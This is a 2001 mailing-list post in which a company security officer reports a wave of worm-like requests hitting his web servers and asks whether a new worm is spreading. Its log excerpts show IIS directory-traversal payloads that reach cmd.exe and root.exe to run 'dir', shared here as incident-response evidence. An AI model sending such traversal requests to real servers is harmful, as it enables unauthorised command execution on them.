Security Incidents mailing list archives
command execution attempts
From: "Keith.Morgan" <Keith.Morgan () Terradon com>
Date: Tue, 18 Sep 2001 09:59:23 -0400
Wow. This morning we've been hit with a deluge of attempts at ....../cmd.exe?<args here> and attempts to access ...../root.exe?<args here> My IDS is going haywire. They're coming from diverse IP's, mostly in the 216.* class A. This doesn't appear to be a standard code-red type thing. Have a look at log exerpts... This all appeared to kick off at roughly 9AM EST. Have I missed some prolific worm out there? 2001-09-18 13:38:01 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 401 - 2001-09-18 13:38:01 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 401 - 2001-09-18 13:38:05 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:05 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:09 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:09 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:11 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 - All of the offending IP's are following this exact pattern, indicating a worm. Keith T. Morgan Chief of Information Security Terradon Communications keith.morgan () terradon com 304-755-8291 x142 ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- command execution attempts Keith.Morgan (Sep 18)